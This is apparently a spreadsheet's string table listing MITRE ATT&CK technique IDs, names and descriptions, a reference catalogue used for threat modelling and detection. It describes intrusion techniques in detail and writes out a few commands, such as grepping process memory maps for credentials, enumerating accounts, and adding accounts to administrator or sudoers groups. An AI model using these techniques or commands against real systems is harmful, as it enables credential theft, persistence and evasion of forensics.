https://attack.mitre.org/techniques/T1036/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1489</t>
  </si>
  <si>
    <t>T1587.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1587/001</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1652</t>
  </si>
  <si>
    <t>T1087.002</t>
  </si>
  <si>
    <t>Domain Account</t>
  </si>
  <si>
    <t>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 on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including &lt;code&gt;Get-ADUser&lt;/code&gt; and &lt;code&gt;Get-ADGroupMember&lt;/code&gt; may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
https://attack.mitre.org/techniques/T1087/002</t>
  </si>
  <si>
    <t>T1547.014</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1547/014</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1564</t>
  </si>
  <si>
    <t>T1559.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1559/002</t>
  </si>
  <si>
    <t>T1204.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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.cpl, and .reg.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https://attack.mitre.org/techniques/T1204/002</t>
  </si>
  <si>
    <t>T1591.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1591/003</t>
  </si>
  <si>
    <t>T1071.005</t>
  </si>
  <si>
    <t>Publish/Subscribe Protocols</t>
  </si>
  <si>
    <t>Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 
Protocols such as &lt;code&gt;MQTT&lt;/code&gt;, &lt;code&gt;XMPP&lt;/code&gt;, &lt;code&gt;AMQP&lt;/code&gt;, and &lt;code&gt;STOMP&lt;/code&gt; use a publish/subscribe design, with message distribution managed by a centralized broker.(Citation: wailing crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their messages by topics, while subscribers receive messages according to their subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse publish/subscribe protocols to communicate with systems under their control from behind a message broker while also mimicking normal, expected traffic.
https://attack.mitre.org/techniques/T1071/005</t>
  </si>
  <si>
    <t>T1592.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1592/001</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>Taint Shared Content</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</si>
  <si>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
https://attack.mitre.org/techniques/T1080</t>
  </si>
  <si>
    <t>T1484.002</t>
  </si>
  <si>
    <t>Trust Modification</t>
  </si>
  <si>
    <t>Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.
Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) 
An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)
https://attack.mitre.org/techniques/T1484/002</t>
  </si>
  <si>
    <t>T1573.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1573/001</t>
  </si>
  <si>
    <t>T1087.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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 on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file. On macOS the &lt;code&gt;dscl . list /Users&lt;/code&gt; command can be used to enumerate local accounts.
https://attack.mitre.org/techniques/T1087/001</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1586/001</t>
  </si>
  <si>
    <t>T1562.009</t>
  </si>
  <si>
    <t>Safe Mode Boot</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</si>
  <si>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
https://attack.mitre.org/techniques/T1562/009</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1542/005</t>
  </si>
  <si>
    <t>T1543.003</t>
  </si>
  <si>
    <t>Windows Service</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</si>
  <si>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‘hidden’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https://attack.mitre.org/techniques/T1543/003</t>
  </si>
  <si>
    <t>T1568.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1568/001</t>
  </si>
  <si>
    <t>T1497.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.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
https://attack.mitre.org/techniques/T1497/001</t>
  </si>
  <si>
    <t>T1053.003</t>
  </si>
  <si>
    <t>Cron</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1053/003</t>
  </si>
  <si>
    <t>T1069.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1069/002</t>
  </si>
  <si>
    <t>T1588.006</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1588/006</t>
  </si>
  <si>
    <t>T1566.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
Adversaries may also utilize spearphishing links to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s that grant immediate access to the victim environment. For example, a user may be lured through “consent phishing” into granting adversaries permissions/access via a malicious OAuth 2.0 request URL .(Citation: Trend Micro Pawn Storm OAuth 2017)(Citation: Microsoft OAuth 2.0 Consent Phishing 2021)
Similarly, malicious links may also target device-based authorization, such as OAuth 2.0 device authorization grant flow which is typically used to authenticate devices without UIs/browsers. Known as “device code phishing,” an adversary may send a link that directs the victim to a malicious authorization page where the user is tricked into entering a code/credentials that produces a device token.(Citation: SecureWorks Device Code Phishing 2021)(Citation: Netskope Device Code Phishing 2021)(Citation: Optiv Device Code Phishing 2021)
https://attack.mitre.org/techniques/T1566/002</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1070/002</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Application or System Exploitation</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</si>
  <si>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https://attack.mitre.org/techniques/T1499/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1137</t>
  </si>
  <si>
    <t>T1218.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/004</t>
  </si>
  <si>
    <t>T1598.003</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</si>
  <si>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embed “tracking pixels”, "web bugs", or "web beacons" within phishing messages to verify the receipt of an email, while also potentially profiling and tracking victim information such as IP address.(Citation: NIST Web Bug) (Citation: Ryte Wiki) These mechanisms often appear as small images (typically one pixel in size) or otherwise obfuscated objects and are typically delivered as HTML code containing a link to a remote server. (Citation: Ryte Wiki)(Citation: IAPP)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perform adversary-in-the-middle phishing by proxying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Adversaries may also send a malicious link in the form of Quick Response (QR) Codes (also known as “quishing”). These links may direct a victim to a credential phishing page.(Citation: QR-campaign-energy-firm) By using a QR code, the URL may not be exposed in the email and may thus go undetected by most automated email security scans.(Citation: qr-phish-agriculture) These QR codes may be scanned by or delivered directly  to a user’s mobile device (i.e., [Phishing](https://attack.mitre.org/techniques/T1660)), which may be less secure in several relevant ways.(Citation: qr-phish-agriculture) For example, mobile users may not be able to notice minor differences between genuine and credential harvesting websites due to mobile’s smaller form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https://attack.mitre.org/techniques/T1598/003</t>
  </si>
  <si>
    <t>T1021.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1021/004</t>
  </si>
  <si>
    <t>T1098.003</t>
  </si>
  <si>
    <t>Additional Cloud Roles</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</si>
  <si>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
In some cases, adversaries may add roles to adversary-controlled accounts outside the victim cloud tenant. This allows these external accounts to perform actions inside the victim tenant without requiring the adversary to [Create Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned account.(Citation: Invictus IR DangerDev 2024)
https://attack.mitre.org/techniques/T1098/003</t>
  </si>
  <si>
    <t>T1547.012</t>
  </si>
  <si>
    <t>Print Processors</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</si>
  <si>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
https://attack.mitre.org/techniques/T1547/012</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Spearphishing Attachment</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</si>
  <si>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https://attack.mitre.org/techniques/T1566/001</t>
  </si>
  <si>
    <t>T1027.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1027/008</t>
  </si>
  <si>
    <t>T1559.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1559/001</t>
  </si>
  <si>
    <t>T1574.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.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
https://attack.mitre.org/techniques/T1574/001</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Automated Collection</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</si>
  <si>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data pipelines, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data.(Citation: Mandiant UNC3944 SMS Phishing 2023)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
https://attack.mitre.org/techniques/T1119</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1115</t>
  </si>
  <si>
    <t>T1003.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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indicative of credentials. Adversaries may use regex patterns, such as &lt;code&gt;grep -E "^[0-9a-f-]* r" /proc/"$pid"/maps | cut -d' ' -f 1&lt;/code&gt;, to look for fixed strings in memory structures or cached hashes.(Citation: atomic-red proc file system)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
https://attack.mitre.org/techniques/T1003/007</t>
  </si>
  <si>
    <t>T1583.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1583/005</t>
  </si>
  <si>
    <t>T1555.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1555/005</t>
  </si>
  <si>
    <t>T1553.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1553/001</t>
  </si>
  <si>
    <t>T1608.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1608/004</t>
  </si>
  <si>
    <t>T1007</t>
  </si>
  <si>
    <t>System Service Discovery</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</si>
  <si>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
https://attack.mitre.org/techniques/T1007</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Adversaries may passively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reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or [Defense Evasion](https://attack.mitre.org/tactics/TA0005) activities. Adversaries may likely also utilize network sniffing during [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) (AiTM) to passively gain additional knowledge about the environment.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
https://attack.mitre.org/techniques/T1040</t>
  </si>
  <si>
    <t>T1553.002</t>
  </si>
  <si>
    <t>Code Signing</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1553/002</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage</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</si>
  <si>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
https://attack.mitre.org/techniques/T1530</t>
  </si>
  <si>
    <t>T1565.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1565/003</t>
  </si>
  <si>
    <t>T1552.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1552/002</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery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</si>
  <si>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
https://attack.mitre.org/techniques/T1135</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Peripheral Device Discovery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</si>
  <si>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
https://attack.mitre.org/techniques/T1120</t>
  </si>
  <si>
    <t>T1036.009</t>
  </si>
  <si>
    <t>Break Process Trees</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1036/009</t>
  </si>
  <si>
    <t>T1590.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/004</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1587/002</t>
  </si>
  <si>
    <t>T1222.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1222/001</t>
  </si>
  <si>
    <t>T1137.006</t>
  </si>
  <si>
    <t>Add-ins</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1137/006</t>
  </si>
  <si>
    <t>T1505.002</t>
  </si>
  <si>
    <t>Transport Agent</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1505/002</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1082</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>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DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22)
https://attack.mitre.org/techniques/T1071</t>
  </si>
  <si>
    <t>T1574.014</t>
  </si>
  <si>
    <t>AppDomainManager</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) 
Known as "AppDomainManager injection," adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)
https://attack.mitre.org/techniques/T1574/014</t>
  </si>
  <si>
    <t>T1074.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1074/002</t>
  </si>
  <si>
    <t>T1098.006</t>
  </si>
  <si>
    <t>Additional Container Cluster Roles</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</si>
  <si>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
https://attack.mitre.org/techniques/T1098/006</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1053</t>
  </si>
  <si>
    <t>T1218.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218/007</t>
  </si>
  <si>
    <t>T1590.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1590/003</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Reflection Amplification</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</si>
  <si>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
https://attack.mitre.org/techniques/T1498/002</t>
  </si>
  <si>
    <t>T1556.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1556/002</t>
  </si>
  <si>
    <t>T1505.005</t>
  </si>
  <si>
    <t>Terminal Services DLL</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</si>
  <si>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
https://attack.mitre.org/techniques/T1505/005</t>
  </si>
  <si>
    <t>T1059.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1059/002</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Browser Extensions</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</si>
  <si>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 for [Command and Control](https://attack.mitre.org/tactics/TA0011).(Citation: Stantinko Botnet)(Citation: Chrome Extension C2 Malware) Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for [Defense Evasion](https://attack.mitre.org/tactics/TA0005).(Citation: Browers FriarFox)(Citation: Browser Adrozek)
https://attack.mitre.org/techniques/T1176</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</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</si>
  <si>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
https://attack.mitre.org/techniques/T1499/002</t>
  </si>
  <si>
    <t>T1195.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1195/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1106</t>
  </si>
  <si>
    <t>T1558.005</t>
  </si>
  <si>
    <t>Ccache Files</t>
  </si>
  <si>
    <t>Adversaries may attempt to steal Kerberos tickets stored in credential cache files (or ccache). These files are used for short term storage of a user's active session credentials. The ccache file is created upon user authentication and allows for access to multiple services without the user having to re-enter credentials. 
The &lt;code&gt;/etc/krb5.conf&lt;/code&gt; configuration file and the &lt;code&gt;KRB5CCNAME&lt;/code&gt; environment variable are used to set the storage location for ccache entries. On Linux, credentials are typically stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`. On macOS, ccache entries are stored by default in memory with an `API:{uuid}` naming scheme. Typically, users interact with ticket storage using &lt;code&gt;kinit&lt;/code&gt;, which obtains a Ticket-Granting-Ticket (TGT) for the principal; &lt;code&gt;klist&lt;/code&gt;, which lists obtained tickets currently held in the credentials cache; and other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense Kerberos Linux)
Adversaries can collect tickets from ccache files stored on disk and authenticate as the current user without their password to perform [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks. Adversaries can also use these tickets to impersonate legitimate users with elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004). Tools like Kekeo can also be used by adversaries to convert ccache files to Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008). On macOS, adversaries may use open-source tools or the Kerberos framework to interact with ccache files and extract TGTs or Service Tickets via lower-level APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
https://attack.mitre.org/techniques/T1558/005</t>
  </si>
  <si>
    <t>T1070.007</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1070/007</t>
  </si>
  <si>
    <t>T1558.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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https://attack.mitre.org/techniques/T1558/004</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1584/003</t>
  </si>
  <si>
    <t>T1059.010</t>
  </si>
  <si>
    <t>AutoHotKey &amp; AutoIT</t>
  </si>
  <si>
    <t>Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
https://attack.mitre.org/techniques/T1059/010</t>
  </si>
  <si>
    <t>T1600.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1600/001</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1070/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)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
https://attack.mitre.org/techniques/T1202</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1091</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1140</t>
  </si>
  <si>
    <t>T1137.005</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1137/005</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</si>
  <si>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</si>
  <si>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</si>
  <si>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preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
https://attack.mitre.org/techniques/T1562</t>
  </si>
  <si>
    <t>T1586.003</t>
  </si>
  <si>
    <t>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</si>
  <si>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Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024)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
https://attack.mitre.org/techniques/T1586/003</t>
  </si>
  <si>
    <t>T1586.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1586/002</t>
  </si>
  <si>
    <t>T1098.007</t>
  </si>
  <si>
    <t>Additional Local or Domain Groups</t>
  </si>
  <si>
    <t>An adversary may add additional local or domain groups to an adversary-controlled account to maintain persistent access to a system or domain.
On Windows, accounts may use the `net localgroup` and `net group` commands to add existing users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation: Microsoft Net Group) On Linux, adversaries may use the `usermod` command for the same purpose.(Citation: Linux Usermod)
For example, accounts may be added to the local administrators group on Windows devices to maintain elevated privileges. They may also be added to the Remote Desktop Users group, which allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On Linux, accounts may be added to the sudoers group, allowing them to persistently leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003) for elevated privileges. 
In Windows environments, machine accounts may also be added to domain groups. This allows the local SYSTEM account to gain privileges on the domain.(Citation: RootDSE AD Detection 2022)
https://attack.mitre.org/techniques/T1098/007</t>
  </si>
  <si>
    <t>T1608.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1608/001</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply Chain Compromise</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</si>
  <si>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
https://attack.mitre.org/techniques/T1195</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</si>
  <si>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</si>
  <si>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</si>
  <si>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(e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)),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https://attack.mitre.org/techniques/T1190</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</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</si>
  <si>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https://attack.mitre.org/techniques/T1558</t>
  </si>
  <si>
    <t>T1555</t>
  </si>
  <si>
    <t>Credentials from Password Stores</t>
  </si>
  <si>
    <t>Adversaries may search for common password storage locations to obtain user credentials.(Citation: F-Secure The Dukes)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
https://attack.mitre.org/techniques/T1555</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1567</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)
https://attack.mitre.org/techniques/T1219</t>
  </si>
  <si>
    <t>T1583.001</t>
  </si>
  <si>
    <t>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</si>
  <si>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Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)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
In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
https://attack.mitre.org/techniques/T1583/001</t>
  </si>
  <si>
    <t>T1560.002</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1560/002</t>
  </si>
  <si>
    <t>T1055.003</t>
  </si>
  <si>
    <t>Thread Execution Hijacking</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055/003</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</si>
  <si>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</si>
  <si>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</si>
  <si>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https://attack.mitre.org/techniques/T1036</t>
  </si>
  <si>
    <t>T1546.011</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1546/011</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Keys](https://attack.mitre.org/techniques/T1552/004)).(Citation: Brining MimiKatz to Unix)
https://attack.mitre.org/techniques/T1552</t>
  </si>
  <si>
    <t>T1547.010</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>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and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham) 
Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
https://attack.mitre.org/techniques/T1547/010</t>
  </si>
  <si>
    <t>T1070.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1070/008</t>
  </si>
  <si>
    <t>T1037.002</t>
  </si>
  <si>
    <t>Login Hook</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1037/002</t>
  </si>
  <si>
    <t>T1659</t>
  </si>
  <si>
    <t>Content Injection</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</si>
  <si>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
https://attack.mitre.org/techniques/T1659</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>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https://attack.mitre.org/techniques/T1055</t>
  </si>
  <si>
    <t>T1567.004</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1567/004</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1205</t>
  </si>
  <si>
    <t>T1021.008</t>
  </si>
  <si>
    <t>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</si>
  <si>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
https://attack.mitre.org/techniques/T1021/008</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</si>
  <si>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</si>
  <si>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</si>
  <si>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
https://attack.mitre.org/techniques/T1218</t>
  </si>
  <si>
    <t>T1070.006</t>
  </si>
  <si>
    <t>Timestomp</t>
  </si>
  <si>
    <t>Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
https://attack.mitre.org/techniques/T1070/006</t>
  </si>
  <si>
    <t>T1557.004</t>
  </si>
  <si>
    <t>Evil Twin</t>
  </si>
  <si>
    <t>Adversaries may host seemingly genuine Wi-Fi access points to deceive users into connecting to malicious networks as a way of supporting follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002), or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia ‘Evil Twin’)
